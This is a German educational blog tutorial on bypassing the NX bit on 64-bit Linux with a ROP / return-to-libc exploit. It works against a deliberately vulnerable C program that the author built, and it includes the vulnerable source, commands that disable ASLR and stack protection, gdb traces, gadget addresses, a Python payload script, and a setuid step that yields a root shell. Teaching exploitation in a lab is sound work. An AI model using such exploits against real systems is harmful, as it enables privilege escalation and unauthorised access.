it-security:blog:buffer_overflow_x64-2

Buffer Overflow im 64-Bit Stack - Teil 2

Im zweiten Teil aktivieren wir das NX-Bit, welches uns vor Buffer Overflows schützen soll. Damit es spaßig bleibt, hebeln wir diesen Schutz natürlich direkt aus. Dies erreichen wir, indem der auszuführende Befehl an die libc-Funktion system() weitergeleitet wird. Grundlegend basiert dieses Tutorial auf der Arbeit von superkojiman 1)

Achtung!

Die Techniken und Methoden in diesem Artikel sind ausschließlich für Lernzwecke. Ein Missbrauch ist strafbar!2)

Weiterführende Infos zum Thema ROP (Return Oriented Programming) und Grundlagen zum Thema Buffer Overflows gibt es in der Linksammlung am Ende. 3) 4)

Im Tutorial von superkojiman wird gezeigt, wie die Register Schritt für Schritt überschrieben werden. Um den Prozess nachzuvollziehen, können wir die kompilierte Binary aus dem Blog debuggen.

br *vuln+73								# setze Breakpoint
r < in.txt								# in.txt wird vom Python Script erzeugt
...									# Breakpoint
RDI: 0x7ffff7fa0a30 --> 0x0 
RBP: 0x4141414141414141 ('AAAAAAAA')					# RBP ist überschrieben
RSP: 0x7fffffffddc8 --> 0x4006a3 (<__libc_csu_init+99>: pop    rdi)	# RSP mit pop rdi Gadget
RIP: 0x40060f (<vuln+73>:       ret)
gdb-peta$ si
...
RDI: 0x7ffff7fa0a30 --> 0x0 
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffddd0 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')	# Pointer nach /bin/sh
RIP: 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)			# pop rdi wurde auf RIP geschrieben
gdb-peta$ si
...
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')				# Pointer wurde auf rdi geschrieben
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffddd8 --> 0x400469 (<_init+25>:   ret)			# NOP
RIP: 0x4006a4 (<__libc_csu_init+100>:   ret)
gdb-peta$ si
...
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7...fdde0 --> 0x7ffff7e17920 (<__libc_system>: test   rdi,rdi)	# system("/bin/sh")
RIP: 0x400469 (<_init+25>:      ret)



Was wird benötigt?

Zu den Tools aus Teil 1, benötigen wir noch ropper.

sudo apt install ropper



Auch hier muss ASLR wieder deaktiviert werden, um konstante Speicherbereiche zu erhalten. In Teil 1 ist beschrieben, was hierfür zu tun ist.

Quellcode und kompilierte Binaries findet Ihr auch auf meinem github repository

Das Ursprungs-Tutorial ist schon ein bisschen älter, so dass der Quellcode nicht 1:1 übernommen werden konnte. Zum einen musste das UID und EUID zusätzlich gesetzt werden 5), zum anderen funktioniert /bin/sh nicht mehr in dieser Art und Weise. 6)

Da es an einem pop rdi; ret; Gadget fehlte, habe ich mir eine entsprechende Funktion erstellt.

/* Code https://blog.techorganic.com/2015/04/21/64-bit-linux-stack-smashing-tutorial-part-2/ */
/* Changes by https://www.nosociety.de/it-security:blog:buffer_overflow_x64-2 */
/* Compile: gcc -fno-stack-protector -no-pie bof-part2.c -o bof-part2      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */
 
#include <stdio.h>
#include <unistd.h>
 
int gadg() {
 asm ("pop %rdi");
 asm ("ret");
 return 0;
}
 
int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}
 
int main(int argc, char *argv[]) {
    setuid(0);
    seteuid(0);
    printf("Try to exec /bin/zsh --interactive");
    vuln();
    return 0;
}



Nun kompilieren wir das Programm. Wichtig ist, dass der no-pie Parameter gesetzt wird. Eine Erklärung liefert der Nutzer b4551k5 hierzu:

It seems that gcc build PIE (position indep. exec.). You can check this using „readelf -e <executable>“. If at the top (the header), Type is „DYN (shared…“ then it is PIE and gets loaded at random base address. You can rebuild the code using „-no-pie“ as compile flag to tell the linker you want to build an executable. This should result in 0x400000 as base address as in the examples above.
gcc -fno-stack-protector -no-pie bof-part2.c -o bof-part2   



Wir benötigen 2 Gadgets, um das Exploit zu erstellen. Hierzu starten wir ropper und lassen uns die Gadgets anzeigen

ropper --file bof-part2
...
0x000000000040116a: pop rdi; ret;
...
0x0000000000401016: ret;

Wir brauchen 40116a, um unser Argument von RSP auf RDI zu schieben und 401016 ist eine NOP Funktion, welche RSP um 8 Bytes verschiebt. 7)

Nun benötigen wir noch 2 Offsets, für das Exploit. Also laden wir unsere Datei in den Debugger und starten:

gdb-peda$ start
...
gdb-peda$ p system
$1 = {int (const char *)} 0x7ffff7e17920 <__libc_system>
 
gdb-peda$ find "/bin/zsh --interactive"
 
Searching for '/bin/zsh --interactive' in: None ranges
Found 2 results, display max 2 items:
bof-part2 : 0x402044 ("/bin/zsh --interactive")
bof-part2 : 0x403044 ("/bin/zsh --interactive")

Das Offset 0x7ffff7e17920 ist die Adresse von system(), unserem libc Aufruf. 0x402044 ist die Adressse unseres Parameters, den wir an system() übergeben wollen. Jetzt haben wir alle nötigen Parameter, um den entprechenden Buffer im Exploit aufzubauen.

#!/usr/bin/env python
 
from struct import *
 
buf = ""
buf += "A"*104                              # junk   
buf += pack("<Q", 0x000000000040116a)       # pop rdi; ret;
buf += pack("<Q", 0x402044)                 # pointer to "/bin/zsh --interactive" gets popped into rdi
buf += pack("<Q", 0x0000000000401016)       # 8 Bytes NOP
buf += pack("<Q", 0x7ffff7e17920)           # address of system()
 
f = open("in.txt", "w")
f.write(buf)



Nun führen wir unser Python Exploit aus, und erstellen die Datei in.txt.

python2 buffer.py



Unsere Datei benötigt noch die entsprechenden root Berechtigungen.

sudo chown root bof-part2
sudo chmod 4755 bof-part2



Nun starten wir unser Programm und übergeben unseren Buffer als Argument.

(cat in.txt | cat) | ./bof-part2
Upgrade der Shell auf root

Unsere User Shell wird zur root Shell aufgewertet und wir haben unser Ziel erreicht.

Projektdateien nosoc-repo-bof-part2.zip ZIP
Größe 4,00 KB
Prüfsumme (SHA256) 88bda11b4652344bb9113a400b79e78abf028ef5eb89a74538061c96e2d306e5

Geben Sie Ihren Kommentar ein:
135 -7 = 
 
  • it-security/blog/buffer_overflow_x64-2.txt
  • Zuletzt geändert: 2024/04/14 12:06
  • von psycore